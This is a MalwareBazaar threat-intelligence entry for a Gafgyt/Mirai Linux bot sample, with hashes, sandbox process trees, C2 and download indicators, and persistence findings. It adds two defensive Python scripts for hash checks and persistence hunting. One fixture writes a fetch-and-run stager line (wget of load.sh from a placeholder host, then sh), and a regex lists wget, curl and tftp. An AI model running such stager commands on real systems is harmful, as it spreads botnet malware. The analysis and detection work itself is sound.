MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 b33b272fe3e00166b7a6eecc26eff8a6dba5bf74e21733840907823e413a8680. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Gafgyt

Vendor detections: 8

SHA256 hash: b33b272fe3e00166b7a6eecc26eff8a6dba5bf74e21733840907823e413a8680
SHA3-384 hash: b9cc3c809eebafe7c6442437096aeac888c8e0af77a9ba82aceefafe80fe7df76c60e506046a0095ef54eb6278c3ebee
SHA1 hash: 3163f6ec23ac1ca0d67d27804220d498228e71da
MD5 hash: 17f8567b0bcc8365a6df920a8a83c335
humanhash: two-one-winter-south
File name: bot.x86_64
Signature: Gafgyt
File size: 75'080 bytes
First seen: 2026-05-13 19:18:12 UTC
Last seen: 2026-05-14 05:20:47 UTC
File type: elf
MIME type: application/x-executable
ssdeep: 1536:HXPErNu/a6D5cr7xsDeD9kgJBtBuDerEgbQ7zTVEYyxSAb/K23na6VhNp3KIDZI/:HXUk/9CJsDeOgrGD1VQfyS7+
TLSH: T1AC734902F9E250BCC446D071475FAB26EB71B84843257BDF67C87AB13E66E902F5A360
telfhash: t1a311e104c2d819ac2bfe59b3a6847e4b98b310d610d97dda636cd7060c54fd33b08132
Magika: elf
Reporter: abuse_ch
Tags: elf gafgyt
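Before doing anything with a download from this entry, a practitioner checks that the bytes on disk match the published hashes and that the ELF header agrees with what the reporter and the sandboxes say about the architecture (the file name says x86_64, one sandbox below reports "x86"; the e_machine field settles it). The following Python is an added example, not tooling from MalwareBazaar or abuse.ch: it computes the four cryptographic hashes listed above with the standard library, compares them with the published values, and reads the ELF class, endianness, e_type and e_machine. FAKE_ELF is a constructed 64-byte header standing in for the real 75'080-byte sample, which is not embedded here, so its hashes will not match the published ones; ssdeep, TLSH and telfhash need third-party libraries and are not computed.

```python
import hashlib
import struct
from pathlib import Path

# Values as published on this MalwareBazaar entry.
PUBLISHED = {
    "sha256": "b33b272fe3e00166b7a6eecc26eff8a6dba5bf74e21733840907823e413a8680",
    "sha1": "3163f6ec23ac1ca0d67d27804220d498228e71da",
    "md5": "17f8567b0bcc8365a6df920a8a83c335",
    "sha3_384": "b9cc3c809eebafe7c6442437096aeac888c8e0af77a9ba82aceefafe80fe7df7"
                "6c60e506046a0095ef54eb6278c3ebee",
}

# e_machine values from the ELF specification (subset covering the bot.<arch>
# payloads named further down the page).
ELF_MACHINES = {2: "SPARC", 3: "x86", 4: "m68k", 8: "MIPS", 20: "PowerPC",
                40: "ARM", 42: "SuperH", 62: "x86-64", 183: "AArch64"}
ELF_TYPES = {1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}


def digests(data: bytes) -> dict:
    """All four hash algorithms the entry publishes, from the standard library."""
    return {
        "sha256": hashlib.sha256(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "md5": hashlib.md5(data).hexdigest(),
        "sha3_384": hashlib.sha3_384(data).hexdigest(),
    }


def verify(data: bytes, published: dict = PUBLISHED) -> dict:
    """Map each published algorithm to True/False depending on whether the
    bytes in hand produce that digest."""
    actual = digests(data)
    return {algo: actual[algo] == value.lower() for algo, value in published.items()}


def elf_header(data: bytes) -> dict:
    """Decode e_ident class/endianness plus e_type and e_machine.
    Raises ValueError when the magic is wrong, so a renamed shell script or a
    truncated download is caught before it is handed to other tools."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    endian = "<" if ei_data == 1 else ">"
    e_type, e_machine = struct.unpack(endian + "HH", data[16:20])
    return {
        "class": {1: "ELF32", 2: "ELF64"}.get(ei_class, "unknown"),
        "endian": "little" if ei_data == 1 else "big",
        "type": ELF_TYPES.get(e_type, f"0x{e_type:x}"),
        "machine": ELF_MACHINES.get(e_machine, f"0x{e_machine:x}"),
    }


def triage_file(path: str) -> dict:
    """Hash check plus header decode for a file on disk (path is caller-supplied)."""
    data = Path(path).read_bytes()
    return {"size": len(data), "hashes_match": verify(data), "elf": elf_header(data)}


# Constructed stand-in: a bare ELF64 little-endian EXEC header for x86-64
# (e_type=2, e_machine=62) padded to the 64-byte header size. Not the sample.
FAKE_ELF = (b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8
            + struct.pack("<HH", 2, 62) + b"\x00" * 44)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    print(triage_file(target) if target else
          {"hashes_match": verify(FAKE_ELF), "elf": elf_header(FAKE_ELF)})
```

Run it as `python3 triage.py bot.x86_64` against the real download; every entry in `hashes_match` must be True before the file is treated as this sample, and `elf.machine` should read x86-64 for a file named bot.x86_64. A mismatch on any one algorithm means a different file, not a partial match.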

Intelligence


File Origin
# of uploads: 2
# of downloads: 47
Origin country: DE
Vendor Threat Intelligence
No detections
Result
Verdict: Malware
Maliciousness:
Behaviour
Launching a process
Runs as daemon
Opens a port
Creating a file
Receives data from a server
Sets a written file as executable
Creating a file in the %temp% directory
Changes the time when the file was created, accessed, or modified
Changes access rights for a written file
Sends data to a server
Creating a process from a recently created file
Connection attempt
Manages services
Creates or modifies files in /cron to set up autorun
Substitutes an application name
Creates or modifies symbolic links in /init.d to set up autorun
Creates or modifies files in /init.d to set up autorun
Verdict: Malicious
Uses P2P?: false
Uses anti-vm?: false
Architecture: x86
Packer: not packed
Botnet: unknown
Number of open files: 148
Number of processes launched: 68
Processes remaining?: true
Remote TCP ports scanned: not identified
Behaviour: Persistence, Process Renaming
Botnet C2s
TCP botnet C2(s): not identified
UDP botnet C2(s): not identified
Status: terminated
Behavior Graph (process tree recovered from the graph export; pids and tags as reported by the sandbox):
pid 3173  /usr/bin/sudo
  execve -> pid 3174  /tmp/sample.bin [net]
    con    -> 127.0.0.1:20123
    clone  -> pid 3175  /tmp/sample.bin
    clone  -> pid 3176  /tmp/sample.bin [zombie]
      clone -> pid 3177  /tmp/sample.bin [write-config, zombie]
        execve -> pid 3178  /usr/bin/dash
          execve -> pid 3179  /usr/sbin/update-rc.d
            execve -> pid 3181  /usr/bin/systemctl
        execve -> pid 3273  /usr/bin/dash
        execve -> pid 3274  /usr/bin/dash
          execve -> pid 3275  /usr/bin/systemctl
        execve -> pid 3360  /usr/bin/dash
          execve -> pid 3361  /usr/bin/systemctl
            execve -> pid 3366  /usr/lib/systemd/systemd-sysv-install
              execve -> pid 3370  /usr/bin/getopt
              execve -> pid 3371  /usr/sbin/update-rc.d
                execve -> pid 3376  /usr/bin/systemctl
              execve -> pid 3471  /usr/sbin/update-rc.d
                execve -> pid 3477  /usr/bin/systemctl
        execve -> pid 3695  /usr/bin/dash
          clone -> pid 3696  /usr/bin/dash
            clone  -> pid 3698  /usr/bin/dash
            execve -> pid 3699  /usr/bin/grep
          clone -> pid 3697  /usr/bin/dash
        execve -> pid 3702  /usr/bin/dash
          clone -> pid 3704  /usr/bin/dash
            clone  -> pid 3706  /usr/bin/dash
            execve -> pid 3707  /usr/bin/grep
          clone -> pid 3705  /usr/bin/dash
        execve -> pid 3709  /usr/bin/dash
          execve -> pid 3711  /etc/init.d/system048
            execve -> pid 3712  /usr/bin/wget [net, send-data, write-file]
              send 136B -> 176.65.139.177:80
            execve -> pid 3723  /usr/bin/curl [net, send-data, write-file]
              send 85B  -> 176.65.139.177:80
              con       -> load.sh:80
              clone -> pid 3736  /usr/bin/curl [dns, net, send-data]
                con      -> load.sh:80
                send 50B -> 10.0.2.3:53
Result
Threat name: Mirai, Gafgyt
Detection: malicious
Classification: spre.troj.evad
Score: 100 / 100
Signature
Antivirus detection for dropped file
Connects to many ports of the same IP (likely port scanning)
Detected Mirai
Drops files in suspicious directories
Executes the "crontab" command typically for achieving persistence
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sample deletes itself
Sample tries to kill a massive number of system processes
Sample tries to kill multiple processes (SIGKILL)
Sample tries to persist itself using cron
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Suricata IDS alerts for network traffic
Uses dynamic DNS services
Yara detected Gafgyt
Behaviour
Behavior Graph (summary recovered from the graph export):
Behavior Graph ID: 1913129
Sample: bot.x86_64.elf
Start date: 13/05/2026
Architecture: LINUX
Score: 100

Network nodes:
  faggotcnc.duckdns.org (signature: Uses dynamic DNS services)
  203.26.249.183, ports 10001, 23, 2323 (CEOSYD-AS-AP Catholic Education Office Sydney, Australia)
  11 other IPs or domains
  Signatures on the root node: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 5 other signatures

Process tree (abridged as in the graph):
  bot.x86_64.elf
    bot.x86_64.elf -> bot.x86_64.elf (Sample tries to kill a massive number of system processes; Sample tries to kill multiple processes (SIGKILL); Sample tries to set files in /etc globally writable; 3 other signatures)
      sh -> system048 -> sh, wget, 2 other processes -> sh bot.powerpc, sh bot.mipsr, sh bot.mips, 39 other processes -> bot.powerpc, bot.mipsr, bot.mips, bot.m68k -> sh
      sh -> crontab (drops /var/spool/cron/crontabs/tmp.143x9I; Sample tries to persist itself using cron; Executes the "crontab" command typically for achieving persistence); sh -> crontab, grep
      sh -> crontab (drops /var/spool/cron/crontabs/tmp.FqKJE3); sh -> crontab, grep
      sh -> update-rc.d -> systemctl (Sample tries to persist itself using System V runlevels)
      sh -> systemctl -> systemd-sysv-install -> update-rc.d -> systemctl; update-rc.d -> systemctl; getopt
      5 other processes
  systemd sh -> sh -> wget; wget; curl; chmod
  systemd sh -> chmod; 3 other processes
  30 other processes -> 4 other processes
  bot.mipsr: Drops files in suspicious directories; Sample deletes itself; Sample tries to persist itself using System V runlevels

Dropped files:
  /var/spool/cron/crontabs/tmp.143x9I (ASCII)
  /var/spool/cron/crontabs/tmp.FqKJE3 (ASCII)
  /etc/rc.local (ASCII, written by bot.powerpc)
  /etc/init.d/system048 (POSIX, written by bot.powerpc)
  /tmp/bot.x86_64 (ELF)
  /tmp/bot.sh4 (ELF)
  /tmp/bot.powerpc (ELF)
  11 other malicious files
Result
Malware family: n/a
Score: 7/10
Tags: credential_access defense_evasion discovery execution linux persistence privilege_escalation
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Changes its process name
Reads process memory
Creates/modifies Cron job
Enumerates running processes
Modifies init.d
Modifies rc script
Modifies systemd
File and Directory Permissions Modification
Deletes itself
Executes dropped EXE
Unexpected DNS network traffic destination
Please note that we are no longer able to provide a coverage score for Virus Total.
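The three sandbox reports above agree on how this sample persists: crontab entries written through the crontab command, an /etc/init.d/system048 script registered with update-rc.d (which creates the runlevel symlinks), an edited /etc/rc.local, files under /etc made world-writable, and bot.<arch> payloads dropped in /tmp. The following Python is an added hunting script, not from MalwareBazaar or any of the sandboxes: pointed at / on a live host or at the mount point of a forensic image, it reports each of those artifacts. build_demo_root() builds a constructed fixture reproducing them so the script runs offline; the script bodies, the example.invalid URL and the generic bot.<arch> name pattern in it are this example's assumptions, not content recovered from the sample.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# Indicator names from the sandbox reports on this page. PAYLOAD_NAME and
# SUSPICIOUS generalise them (any bot.<arch>, any /tmp or wget/curl/tftp
# reference) and are this example's own assumption.
INIT_SCRIPT = "system048"
PAYLOAD_NAME = re.compile(r"^bot\.[a-z0-9_]+$")
SUSPICIOUS = re.compile(r"(/tmp/|/dev/shm/|\bwget\b|\bcurl\b|\btftp\b|\bsystem048\b)")
ELF_MAGIC = b"\x7fELF"


def _text(p: Path) -> str:
    try:
        return p.read_text(errors="replace")
    except OSError:
        return ""


def _is_elf(p: Path) -> bool:
    try:
        with p.open("rb") as f:
            return f.read(4) == ELF_MAGIC
    except OSError:
        return False


def scan_persistence(root="/"):
    """Report the persistence artifacts described in the sandbox reports under
    `root` (a live system or a mounted image) as dicts {category, path, detail}."""
    root = Path(root)
    found, flagged_init = [], set()

    def hit(category, path, detail):
        found.append({"category": category, "path": str(path), "detail": detail})

    # init scripts: the reported name, or any script that stages from /tmp or the network
    initd = root / "etc/init.d"
    if initd.is_dir():
        for p in sorted(initd.iterdir()):
            if p.is_file() and (p.name == INIT_SCRIPT or SUSPICIOUS.search(_text(p))):
                flagged_init.add(p.name)
                hit("init.d", p, "stager init script")

    # runlevel symlinks that update-rc.d creates for a flagged script
    for link in sorted(root.glob("etc/rc?.d/*")):
        if link.is_symlink() and os.readlink(link).rsplit("/", 1)[-1] in flagged_init:
            hit("sysv-link", link, "-> " + os.readlink(link))

    rc_local = root / "etc/rc.local"
    if rc_local.is_file():
        for line in _text(rc_local).splitlines():
            if SUSPICIOUS.search(line) and not line.lstrip().startswith("#"):
                hit("rc.local", rc_local, line.strip())

    # user crontabs, system crontab and cron.d fragments
    cron_files = [root / "etc/crontab"]
    for d in ("var/spool/cron/crontabs", "var/spool/cron", "etc/cron.d"):
        if (root / d).is_dir():
            cron_files += [p for p in (root / d).iterdir() if p.is_file()]
    for cf in cron_files:
        for line in _text(cf).splitlines():
            if SUSPICIOUS.search(line) and not line.lstrip().startswith("#"):
                hit("cron", cf, line.strip())

    # "sets files in /etc globally writable": regular files carrying the o+w bit
    etc = root / "etc"
    if etc.is_dir():
        for p in sorted(etc.rglob("*")):
            st = p.lstat()
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IWOTH:
                hit("world-writable", p, oct(stat.S_IMODE(st.st_mode)))

    # dropped multi-architecture payloads
    tmp = root / "tmp"
    if tmp.is_dir():
        for p in sorted(tmp.iterdir()):
            if p.is_file() and PAYLOAD_NAME.match(p.name) and _is_elf(p):
                hit("tmp-payload", p, "ELF named bot.<arch>")
    return found


def build_demo_root() -> str:
    """Constructed fixture mirroring the reported artifacts; nothing in it is
    taken from the real sample (the URL and script bodies are invented)."""
    root = Path(tempfile.mkdtemp(prefix="gafgyt-demo-"))
    for d in ("etc/init.d", "etc/rc3.d", "var/spool/cron/crontabs", "tmp"):
        (root / d).mkdir(parents=True)
    init = root / "etc/init.d" / INIT_SCRIPT
    init.write_text("#!/bin/sh\ncd /tmp; wget http://example.invalid/load.sh; sh load.sh\n")
    init.chmod(0o755)
    os.symlink(f"../init.d/{INIT_SCRIPT}", root / "etc/rc3.d" / f"S99{INIT_SCRIPT}")
    rc = root / "etc/rc.local"
    rc.write_text(f"#!/bin/sh\n/etc/init.d/{INIT_SCRIPT} start\nexit 0\n")
    rc.chmod(0o755)
    (root / "var/spool/cron/crontabs/root").write_text("@reboot /tmp/bot.x86_64\n")
    for name, mode in (("hosts", 0o666), ("passwd", 0o644)):  # hosts made o+w, passwd left sane
        f = root / "etc" / name
        f.write_text("placeholder\n")
        f.chmod(mode)
    (root / "tmp/bot.x86_64").write_bytes(ELF_MAGIC + b"\x00" * 60)  # ELF magic only
    (root / "tmp/notes.txt").write_text("benign\n")
    return str(root)


if __name__ == "__main__":
    for f in scan_persistence(build_demo_root()):
        print(f"{f['category']:<15} {f['path']}  {f['detail']}")
```

Against a real host run it with `scan_persistence("/")`; against an image, pass the mount point so every path is resolved relative to it. The script reads files and permission bits only; it does not execute anything it finds, which matters because /etc/init.d/system048 on an infected box is the stager that re-fetches the multi-architecture payloads.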

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: ELF_IoT_Persistence_Hunt
Author: 4r4
Description: Hunts for ELF files with persistence and download capabilities

Rule name: linux_generic_ipv6_catcher
Author: @_lubiedo
Description: ELF samples using IPv6 addresses

Rule name: TH_Generic_MassHunt_Linux_Malware_2026_CYFARE
Author: CYFARE
Description: Generic Linux malware mass-hunt rule - 2026
Reference: https://cyfare.net/

Rule name: unixredflags3
Author: Tim Brown @timb_machine
Description: Hunts for UNIX red flags

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method   Signature   File type   SHA256
Web download      Gafgyt      elf         b33b272fe3e00166b7a6eecc26eff8a6dba5bf74e21733840907823e413a8680 (this sample)

Delivery method: Distributed via web download